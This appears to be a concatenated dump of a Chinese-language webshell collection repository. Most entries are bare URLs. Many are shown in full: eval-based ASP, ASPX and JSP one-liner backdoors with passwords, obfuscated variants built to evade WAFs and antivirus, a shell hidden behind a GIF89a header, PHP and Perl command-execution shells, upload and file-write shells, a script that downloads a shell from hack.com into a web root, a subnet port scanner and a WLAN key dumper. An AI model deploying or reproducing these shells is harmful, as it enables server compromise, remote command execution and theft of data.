6 | 9 | 10 | -------------------------------------------------------------------------------- /138shell/W/w.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/W/w.php.txt -------------------------------------------------------------------------------- /138shell/W/w4k.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/W/w4k.php.txt -------------------------------------------------------------------------------- /138shell/W/wacking.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/W/wacking.php.txt -------------------------------------------------------------------------------- /138shell/X/xinfo.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/X/xinfo.php.txt -------------------------------------------------------------------------------- /138shell/Z/Zehir 4.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/Z/Zehir 4.asp.txt -------------------------------------------------------------------------------- /138shell/Z/zehir4.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/138shell/Z/zehir4.asp.txt -------------------------------------------------------------------------------- /Backdoor Dev Shells/devshell.cfm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/Backdoor Dev Shells/devshell.cfm -------------------------------------------------------------------------------- /Backdoor Dev Shells/readme.md: -------------------------------------------------------------------------------- 1 | DevShell全套支持asp,aspx,php,jsp,cgi,cfm(含源码) 其中devshell.cfm 是CFM的马 密码:adobe123 使用方式:http://url/test.cfm?o=login -------------------------------------------------------------------------------- /asp/08小组内部交流专用.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/08小组内部交流专用.asp.txt -------------------------------------------------------------------------------- /asp/1d.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/1d.asp -------------------------------------------------------------------------------- /asp/2013110125027897.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/2013110125027897.asp -------------------------------------------------------------------------------- /asp/404.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/404.asp -------------------------------------------------------------------------------- /asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一asp.txt -------------------------------------------------------------------------------- /asp/ASP一句话02.txt: -------------------------------------------------------------------------------- 1 | ASP 2 | 3 | <%eval request("sb")%> 4 | 5 | <%execute request("sb")%> 6 | 7 | %><%Eval(Request(chr(35)))%><% 8 | 9 | <%ExecuteGlobal request("sb")%> 10 | 11 | 在数据库里插入的一句话木马 12 | 13 | ┼攠數畣整爠煥敵瑳∨∣┩愾 14 | 15 | ┼癥污爠煥敵瑳∨≡┩> 密码为: a 16 | 17 | -------------------------------------------------------------------------------- /asp/Asp最新变形一句话.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Function MorfiCoder(Code) 3 | MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) 4 | End Function 5 | Execute MorfiCoder(")/*/z/*/(tseuqer lave") 6 | %> 7 | 8 | password:z -------------------------------------------------------------------------------- /asp/CyberSpy5.Asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/CyberSpy5.Asp -------------------------------------------------------------------------------- /asp/EFSO_2.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/EFSO_2.asp -------------------------------------------------------------------------------- /asp/Inderxer.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/Inderxer.asp -------------------------------------------------------------------------------- /asp/RadHat-webshell-del-backdoor/加密版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/RadHat-webshell-del-backdoor/加密版.asp -------------------------------------------------------------------------------- /asp/RadHat-webshell-del-backdoor/明文版.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/RadHat-webshell-del-backdoor/明文版.asp -------------------------------------------------------------------------------- /asp/Rader.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/Rader.asp -------------------------------------------------------------------------------- /asp/ajs/readme.md: -------------------------------------------------------------------------------- 1 | like this: 2 | 3 | www.site.com/shell.asp?x=a -------------------------------------------------------------------------------- /asp/bypass-iisuser-p.asp: -------------------------------------------------------------------------------- 1 | <%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if f.attributes <> 39 then:f.attributes = 39:end if%> -------------------------------------------------------------------------------- /asp/bypass-waf.asp: -------------------------------------------------------------------------------- 1 | 2 | <% 3 | dim x1,x2 4 | x1 = request("pass") 5 | x2 = x1 6 | eval x2 7 | %> 8 | 9 | -------------------------------------------------------------------------------- /asp/cmd.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/cmd.asp.txt -------------------------------------------------------------------------------- /asp/con2.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/con2.asp -------------------------------------------------------------------------------- /asp/hididi.net.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/hididi.net.txt -------------------------------------------------------------------------------- /asp/ice.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/ice.asp -------------------------------------------------------------------------------- /asp/killdoor.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/killdoor.txt -------------------------------------------------------------------------------- /asp/lpl38-com-RedHat/radhat.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/lpl38-com-RedHat/radhat.asp -------------------------------------------------------------------------------- /asp/lpl38-com-RedHat/readme.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/lpl38-com-RedHat/readme.txt -------------------------------------------------------------------------------- /asp/lpl38-com-RedHat/解包unpack.vbs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/lpl38-com-RedHat/解包unpack.vbs -------------------------------------------------------------------------------- /asp/lpl38-com-redhat.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/lpl38-com-redhat.asp.txt -------------------------------------------------------------------------------- /asp/luoss.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/luoss.asp.txt -------------------------------------------------------------------------------- /asp/nonoseed0121.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/nonoseed0121.asp.txt -------------------------------------------------------------------------------- /asp/r00ts无FSO组建大马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/r00ts无FSO组建大马.asp -------------------------------------------------------------------------------- /asp/test.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/test.asp.txt -------------------------------------------------------------------------------- /asp/vps提权马.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/vps提权马.asp -------------------------------------------------------------------------------- /asp/不带引号的Asp一句话.asp: -------------------------------------------------------------------------------- 1 | 发现有些狗特别喜欢在引号前面加“\” 2 | 3 | 所以找了一个不带引号的Asp一句话 4 | 5 | //Asp的 6 | 7 | 服务端: <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %> 8 | 9 | 菜刀配置地址填: http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave 密码填0 -------------------------------------------------------------------------------- /asp/不灭之魂.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/不灭之魂.asp -------------------------------------------------------------------------------- /asp/传说中的hcker.asp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/asp/传说中的hcker.asp.txt -------------------------------------------------------------------------------- /aspx/2013110125222650.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/2013110125222650.aspx -------------------------------------------------------------------------------- /aspx/ASPX一句话: -------------------------------------------------------------------------------- 1 | ASPX一句话 2 | 3 | 1) <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 4 | 2) <%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%> 5 |   //Jscript的asp.net一句话 6 | 3) <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%> 7 |   //C#的asp.net一句话 8 | 4) <% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %> 9 | -------------------------------------------------------------------------------- /aspx/ASPX一句话02.txt: -------------------------------------------------------------------------------- 1 | <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 2 | 3 | < %@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%> 4 | 5 | <%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%> 6 | 7 | <% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %> -------------------------------------------------------------------------------- /aspx/aspx下嗅探工具websniff1.0-linux.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/aspx下嗅探工具websniff1.0-linux.aspx -------------------------------------------------------------------------------- /aspx/aspx变形一句话.aspx: -------------------------------------------------------------------------------- 1 | 10 | <% 11 | popup(popup(System.Text.Encoding.GetEncoding(65001). 12 | 13 | GetString(System.Convert.FromBase64String("UmVxdWVzdC5JdGVtWyJ6Il0=")))); 14 | 15 | %> 16 | 17 | password:z -------------------------------------------------------------------------------- /aspx/con2.aspx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/con2.aspx -------------------------------------------------------------------------------- /aspx/editor.aspx: -------------------------------------------------------------------------------- 1 | <%@Page Language="Jscript"%><%eval(Request.Item["iceking"],"unsafe");%> -------------------------------------------------------------------------------- /aspx/nishang/.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | *.sln merge=union 7 | *.csproj merge=union 8 | *.vbproj merge=union 9 | *.fsproj merge=union 10 | *.dbproj merge=union 11 | 12 | # Standard to msysgit 13 | *.doc diff=astextplain 14 | *.DOC diff=astextplain 15 | *.docx diff=astextplain 16 | *.DOCX diff=astextplain 17 | *.dot diff=astextplain 18 | *.DOT diff=astextplain 19 | *.pdf diff=astextplain 20 | *.PDF diff=astextplain 21 | *.rtf diff=astextplain 22 | *.RTF diff=astextplain 23 | -------------------------------------------------------------------------------- /aspx/nishang/Backdoors/DNS_TXT_Pwnage.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/nishang/Backdoors/DNS_TXT_Pwnage.ps1 -------------------------------------------------------------------------------- /aspx/nishang/Backdoors/Execute-OnTime.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/nishang/Backdoors/Execute-OnTime.ps1 -------------------------------------------------------------------------------- /aspx/nishang/Backdoors/HTTP-Backdoor.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/nishang/Backdoors/HTTP-Backdoor.ps1 -------------------------------------------------------------------------------- /aspx/nishang/Gather/Get-WLAN-Keys.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | Nishang Payload which dumps keys for WLAN profiles. 4 | 5 | .DESCRIPTION 6 | This payload dumps keys in clear text for saved WLAN profiles. 7 | The payload must be run from as administrator to get the keys. 8 | 9 | .EXAMPLE 10 | PS > Get-WLAN-Keys 11 | 12 | .LINK 13 | http://poshcode.org/1700 14 | https://github.com/samratashok/nishang 15 | #> 16 | 17 | 18 | function Get-Wlan-Keys 19 | { 20 | 21 | [CmdletBinding()] 22 | Param () 23 | 24 | $wlans = netsh wlan show profiles | Select-String -Pattern "All User Profile" | Foreach-Object {$_.ToString()} 25 | $exportdata = $wlans | Foreach-Object {$_.Replace(" All User Profile : ",$null)} 26 | $exportdata | ForEach-Object {netsh wlan show profiles name="$_" key=clear} 27 | 28 | } 29 | -------------------------------------------------------------------------------- /aspx/nishang/Gather/Keylogger.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/nishang/Gather/Keylogger.ps1 -------------------------------------------------------------------------------- /aspx/nishang/Misc/Nishang_Logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/nishang/Misc/Nishang_Logo.png -------------------------------------------------------------------------------- /aspx/nishang/Misc/Nishang_logo_small.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/nishang/Misc/Nishang_logo_small.png -------------------------------------------------------------------------------- /aspx/nishang/Misc/Speak.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | Nishang Payload to which "speaks" the given sentence 4 | 5 | .DESCRIPTION 6 | This payload uses the Speech API and the given senetence 7 | is spoken in the MS Narrator's voice. 8 | 9 | .PARAMETER Sentence 10 | The sentence to be spoken 11 | 12 | .EXAMPLE 13 | PS > Speak 14 | 15 | .LINK 16 | http://labofapenetrationtester.blogspot.com/ 17 | https://github.com/samratashok/nishang 18 | #> 19 | 20 | 21 | 22 | 23 | function Speak 24 | { 25 | Param( 26 | [Parameter(Position = 0, Mandatory = $True)] 27 | [String] 28 | $Sentence 29 | ) 30 | (new-object -com SAPI.SpVoice).speak("$Sentence") 31 | } 32 | -------------------------------------------------------------------------------- /aspx/nishang/Scan/Brute-Force.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/nishang/Scan/Brute-Force.ps1 -------------------------------------------------------------------------------- /aspx/nishang/nishang.psm1: -------------------------------------------------------------------------------- 1 |  2 | <# 3 | Import this module to use all the scripts in nishang, except Keylogger in current powershell session. The module must reside in the nishang folder. 4 | 5 | PS > Import-Module .\nishang.psm1 6 | 7 | http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html 8 | https://github.com/samratashok/nishang 9 | #> 10 | 11 | 12 | #Code stolen from here https://github.com/mattifestation/PowerSploit 13 | Get-ChildItem -Recurse (Join-Path $PSScriptRoot *.ps1) | ForEach-Object { if ($_.Name -ne "Keylogger.ps1") {. $_.FullName}} 14 | 15 | -------------------------------------------------------------------------------- /aspx/z1(1).txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/aspx/z1(1).txt -------------------------------------------------------------------------------- /caidao-shell/404.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /caidao-shell/README.md: -------------------------------------------------------------------------------- 1 | 这个是菜刀一句话客户端集合,如需要标准的,菜刀工具里是自带的。 2 | 3 | 需要菜刀原程序的请自行百度 or google 4 | 5 | 还有一点就是 菜刀最后的版本是caidao-20111116 6 | 7 | zip压缩包的md5: 04A4980C9E86B5BA267F8E55CEAC2119 8 | 9 | "一句话"的艺术——简单的编码和变形绕过检测 url: http://drops.wooyun.org/tips/839 10 | -------------------------------------------------------------------------------- /caidao-shell/aspx.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/aspx.jpg -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/ASP读终端端口.ccc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/caidao-plug/ASP读终端端口.ccc -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/Aspx文件搜索.ccc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/caidao-plug/Aspx文件搜索.ccc -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/Aspx设置权限.ccc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/caidao-plug/Aspx设置权限.ccc -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/PHP批量挂马.ccc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/caidao-plug/PHP批量挂马.ccc -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/README.md: -------------------------------------------------------------------------------- 1 | 这个是菜刀插件包,比较早,各位就将就用吧~ 2 | 前人种树,后人乘凉。 3 | 谢谢各位大牛 ^_^ 4 | -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/asp目录写权限检测.ccc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/caidao-plug/asp目录写权限检测.ccc -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/php_HTTP代理.ccc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/caidao-plug/php_HTTP代理.ccc -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/phpspy2011.ccc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/caidao-plug/phpspy2011.ccc -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/php端口转向.ccc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/caidao-plug/php端口转向.ccc -------------------------------------------------------------------------------- /caidao-shell/caidao-plug/扫描端口_php.ccc: -------------------------------------------------------------------------------- 1 | for ($i=1; $i<255; $i++) 2 | { 3 | 4 | $strHost = "192.168.1.{$i}"; 5 | $fp = @fsockopen($strHost, 80, $errno, $errstr, 1); 6 | if (!$fp) 7 | { 8 | print "{$i}.{$errstr}\n"; 9 | } 10 | else 11 | { 12 | print "{$i}.open\n"; 13 | } 14 | 15 | fclose($fp); 16 | 17 | } -------------------------------------------------------------------------------- /caidao-shell/download 下载文件.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Set xPost = createObject("Microsoft.XMLHTTP") 3 | xPost.Open "GET","http://hack.com/shell.txt",0 4 | xPost.Send() 5 | Set sGet = createObject("ADODB.Stream") 6 | sGet.Mode = 3 7 | sGet.Type = 1 8 | sGet.Open() 9 | sGet.Write(xPost.responseBody) 10 | sGet.SaveToFile "D:\website\jingsheng\Templates\heise\html\shell.asp",2 11 | %> -------------------------------------------------------------------------------- /caidao-shell/fuck.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /caidao-shell/guo.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /caidao-shell/hkmjj.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/hkmjj.asp -------------------------------------------------------------------------------- /caidao-shell/ice.asp: -------------------------------------------------------------------------------- 1 | GIF89a 2 | <%eval request("ice")%> -------------------------------------------------------------------------------- /caidao-shell/ice.aspx: -------------------------------------------------------------------------------- 1 | GIF89a 2 | <%@ Page Language="Jscript"%><%eval(Request.Item["ice"],"unsafe");%> -------------------------------------------------------------------------------- /caidao-shell/ice.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/ice.jpg -------------------------------------------------------------------------------- /caidao-shell/ice.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /caidao-shell/mdb.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/mdb.asp -------------------------------------------------------------------------------- /caidao-shell/php.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/php.jpg -------------------------------------------------------------------------------- /caidao-shell/说明.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/caidao-shell/说明.log -------------------------------------------------------------------------------- /drag/README.md: -------------------------------------------------------------------------------- 1 | 这个是拖库脚本集合 2 | -------------------------------------------------------------------------------- /drag/mysql数据库脱单个表.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/drag/mysql数据库脱单个表.jsp -------------------------------------------------------------------------------- /drag/脱mysql数据库.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/drag/脱mysql数据库.jsp -------------------------------------------------------------------------------- /fuzzdb-webshell/README.md: -------------------------------------------------------------------------------- 1 | 这个fuzzdb 收集的 2 | 3 | 留个备份 4 | 5 | 前人种树,后人乘凉 6 | 7 | 感谢各位大牛的无私贡献 -------------------------------------------------------------------------------- /fuzzdb-webshell/asp/ntdaddy.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/fuzzdb-webshell/asp/ntdaddy.asp -------------------------------------------------------------------------------- /fuzzdb-webshell/jsp/CmdServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/fuzzdb-webshell/jsp/CmdServlet.class -------------------------------------------------------------------------------- /fuzzdb-webshell/jsp/ListServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/fuzzdb-webshell/jsp/ListServlet.class -------------------------------------------------------------------------------- /fuzzdb-webshell/jsp/UpServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/fuzzdb-webshell/jsp/UpServlet.class -------------------------------------------------------------------------------- /fuzzdb-webshell/php/cmd.php: -------------------------------------------------------------------------------- 1 | 11 | 12 |
13 | 14 | 15 |
16 |
17 | 
22 | 
23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /fuzzdb-webshell/php/list.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | " . $filename . "
"; 23 | } 24 | closedir($handle); 25 | } else { 26 | echo "FILE: " . $fichero . "

";
27 |   $fp = fopen($fichero, "r");
28 |   $buffer = fread($fp, filesize($fichero));
29 |   echo $buffer;
30 |   fclose($fp);
31 |   }
32 | 
33 | ?>


--------------------------------------------------------------------------------
/fuzzdb-webshell/php/simple-backdoor.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | ";
 7 |         $cmd = ($_REQUEST['cmd']);
 8 |         system($cmd);
 9 |         echo "
"; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /fuzzdb-webshell/php/up.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 |
15 | 16 |

Local File: 17 |

Remote File: 18 | 19 |




20 | 21 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /fuzzdb-webshell/pl-cgi/perlcmd.cgi: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl -w 2 | 3 | use strict; 4 | 5 | print "Cache-Control: no-cache\n"; 6 | print "Content-type: text/html\n\n"; 7 | 8 | my $req = $ENV{QUERY_STRING}; 9 | chomp ($req); 10 | $req =~ s/%20/ /g; 11 | $req =~ s/%3b/;/g; 12 | 13 | print ""; 14 | 15 | print ''; 16 | 17 | if (!$req) { 18 | print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd"; 19 | } 20 | else { 21 | print "Executing: $req"; 22 | } 23 | 24 | print "
";
25 | 	my @cmd = `$req`;
26 | 	print "
"; 27 | 28 | foreach my $line (@cmd) { 29 | print $line . "
"; 30 | } 31 | 32 | print ""; 33 | 34 | # 35 | -------------------------------------------------------------------------------- /fuzzdb-webshell/sh/cmd.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/fuzzdb-webshell/sh/cmd.sh -------------------------------------------------------------------------------- /jsp/12302.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/jsp/12302.jsp -------------------------------------------------------------------------------- /jsp/2.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/jsp/2.jsp -------------------------------------------------------------------------------- /jsp/400.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/jsp/400.jsp -------------------------------------------------------------------------------- /jsp/404.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/jsp/404.jsp -------------------------------------------------------------------------------- /jsp/520.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/jsp/520.jsp -------------------------------------------------------------------------------- /jsp/IXRbE.jsp: -------------------------------------------------------------------------------- 1 | <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx -------------------------------------------------------------------------------- /jsp/IXRbE02.jsp: -------------------------------------------------------------------------------- 1 | <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>xIXRbE.jspx -------------------------------------------------------------------------------- /jsp/JFolder.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/jsp/JFolder.jsp -------------------------------------------------------------------------------- /jsp/JSP一句话: -------------------------------------------------------------------------------- 1 | JSP一句话 2 | 3 | 1) <% if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes()); %> 4 | 5 |   提交客户端: 6 |   
7 |   

8 |    9 |    -------------------------------------------------------------------------------- /jsp/JspWebshell 1.2.jsp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ridter/webshell/93b6a7d7e56247991585e39c0492b20792729e61/jsp/JspWebshell 1.2.jsp -------------------------------------------------------------------------------- /jsp/Silic.jsp: -------------------------------------------------------------------------------- 1 | <%@ page language="java" pageEncoding="gbk"%><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%>
" name="url">


